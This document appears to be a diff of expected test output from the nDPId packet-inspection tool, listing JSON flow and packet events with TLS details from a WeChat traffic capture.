{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 